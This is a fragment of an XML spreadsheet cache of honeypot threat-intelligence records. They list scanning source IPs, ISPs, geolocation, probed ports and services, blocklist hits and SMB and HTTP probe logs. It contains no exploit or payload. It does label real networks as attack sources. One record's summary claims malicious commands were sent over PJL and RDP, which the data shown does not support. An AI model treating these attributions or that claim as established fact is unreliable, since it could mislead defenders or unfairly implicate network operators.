    <s v="31"/>
    <s v="Buriram"/>
    <s v="Satuek"/>
    <s v="Satuek"/>
    <s v="1606378"/>
    <s v="NA"/>
    <s v="15.297"/>
    <s v="103.292"/>
    <s v="131090"/>
    <s v="CAT Telecom Public Company Limited"/>
    <s v="CAT Telecom Public Company Limited"/>
    <s v="business"/>
    <s v="CAT BBviaOnnet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6e4d:f494"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1046"/>
    <x v="1046"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T12:07:03"/>
    <d v="2024-07-14T07:13:09"/>
    <d v="2025-04-23T12:07:03"/>
    <n v="93"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;3306&amp;&amp;1433&amp;&amp;33026"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ef1:506a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1047"/>
    <x v="1047"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T12:00:38"/>
    <d v="2025-04-17T09:35:03"/>
    <d v="2025-04-23T12:00:38"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Kolkata"/>
    <s v="Kolkata (Belgachia)"/>
    <s v="1275004"/>
    <s v="700037"/>
    <s v="22.6056"/>
    <s v="88.386"/>
    <s v="135872"/>
    <s v="GTPL KCBPL BROADBAND PVT LTD"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="residential"/>
    <s v="Abhishek Cables Private Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67a5:7264"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1048"/>
    <x v="1048"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T11:55:18"/>
    <d v="2025-04-23T11:53:00"/>
    <d v="2025-04-23T11:55:18"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="Prakasam"/>
    <s v="Ongole"/>
    <s v="1261045"/>
    <s v="NA"/>
    <s v="15.5036"/>
    <s v="80.0445"/>
    <s v="141266"/>
    <s v="Inri Communications Pvt Ltd"/>
    <s v="Inri Communications Pvt Ltd"/>
    <s v="business"/>
    <s v="Access Smart Solutions India Pvt Ltd"/>
    <s v="2014-04-16"/>
    <s v="ACCESSSMART"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67e5:8168"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1049"/>
    <x v="1049"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T11:52:02"/>
    <d v="2025-04-23T11:52:02"/>
    <d v="2025-04-23T11:52:02"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="17813"/>
    <s v="MTNL-AP"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="MTNL Delhi"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7839:5527"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1050"/>
    <x v="1050"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T11:23:48"/>
    <d v="2025-04-06T00:38:51"/>
    <d v="2025-04-23T11:23:48"/>
    <n v="16"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="VIETEL"/>
    <s v="2011-03-04"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:abf6:58c5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1051"/>
    <x v="1051"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T11:17:52"/>
    <d v="2023-07-24T19:16:59"/>
    <d v="2025-04-23T11:17:52"/>
    <n v="1337"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;64078&amp;&amp;80&amp;&amp;24354&amp;&amp;1433&amp;&amp;3306&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Pusat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.20309"/>
    <s v="106.845"/>
    <s v="131111"/>
    <s v="PT Mora Telematika Indonesia"/>
    <s v="MORATELINDONAP"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2020-08-12"/>
    <s v="CEPATNET-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,55152)}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,55478)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,52203)}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,52676)}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,64233)}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,64815)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,52440)}&amp;&amp;{Data_SMB:Incoming connection (103.154.142.35,53192)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:679a:8e23"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1052"/>
    <x v="1052"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T11:11:47"/>
    <d v="2024-05-31T11:07:14"/>
    <d v="2025-04-23T11:11:47"/>
    <n v="823"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_POP3_H6&amp;&amp;SMA-LAB_POSTGRES_H3&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_VNC_H3&amp;&amp;SMA-LAB_SMB_H41&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;55470&amp;&amp;55432&amp;&amp;55451&amp;&amp;55485&amp;&amp;NA&amp;&amp;110&amp;&amp;5432&amp;&amp;1080&amp;&amp;9100&amp;&amp;5900&amp;&amp;445&amp;&amp;29711&amp;&amp;80"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Jeongja-dong)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3644"/>
    <s v="127.116"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d3e1:2937"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1053"/>
    <x v="1053"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T11:11:42"/>
    <d v="2024-05-28T02:14:57"/>
    <d v="2025-04-23T11:11:42"/>
    <n v="150"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;NA&amp;&amp;57102&amp;&amp;80&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="11"/>
    <s v="Seoul"/>
    <s v="NA"/>
    <s v="Seoul (Toegye-ro)"/>
    <s v="1835848"/>
    <s v="NA"/>
    <s v="37.5614"/>
    <s v="126.996"/>
    <s v="9318"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="SK Broadband Co Ltd"/>
    <s v="business"/>
    <s v="broadNnet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="GET&amp;&amp;connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Connection': 'close', 'Host': '127.0.0.1', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1e7:de1a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1054"/>
    <x v="1054"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T11:10:41"/>
    <d v="2024-06-08T12:43:00"/>
    <d v="2025-04-23T11:10:41"/>
    <n v="872"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H44"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;445&amp;&amp;1405&amp;&amp;NA&amp;&amp;9100&amp;&amp;1456"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="43"/>
    <s v="North Chungcheong"/>
    <s v="Jeungpyeong-gun"/>
    <s v="Jeungpyeong-gun (Jeungpyeong-eup)"/>
    <s v="8419683"/>
    <s v="NA"/>
    <s v="36.7669"/>
    <s v="127.604"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70a7:e860"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="It appears that a threat actor is performing reconnaissance and gathering information about various network services, including DNS, FTP, HTTP, HTTPS, IMAP, IPP, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, POSTGRES, RDP, REDIS, SIP, SMB, SMTP, SNMP, and others. The attacker is sending probes to these services, attempting to connect and gather information about the systems and networks they are targeting."/>
    <s v="The threat actor seems to be interested in exploiting vulnerabilities in these services, as evidenced by the presence of malicious commands and scripts being sent over some protocols (such as PJL and RDP). "/>
  </r>
  <r>
    <x v="1055"/>
    <x v="1055"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T11:07:14"/>
    <d v="2024-12-03T11:13:54"/>
    <d v="2025-04-23T11:07:14"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="17917"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="Hfcl Infotel LTD"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1bff:8404"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1056"/>
    <x v="1056"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T11:05:40"/>
    <d v="2025-02-15T00:36:31"/>
    <d v="2025-04-23T11:05:40"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_ORACLE_H46&amp;&amp;SMA-LAB_IMAP_HC1"/>
    <s v="1521&amp;&amp;143&amp;&amp;443&amp;&amp;3389&amp;&amp;23&amp;&amp;5432&amp;&amp;3306&amp;&amp;80&amp;&amp;NA&amp;&amp;6379"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']}"/>
    <n v="79"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="BE"/>
    <s v="Berlin"/>
    <s v="NA"/>
    <s v="Berlin (Bezirk Treptow-Köpenick)"/>
    <s v="2950159"/>
    <s v="12489"/>
    <s v="52.4286"/>
    <s v="13.531600000000001"/>
    <s v="208843"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="business"/>
    <s v="Alpha Strike Labs GmbH"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA"/>
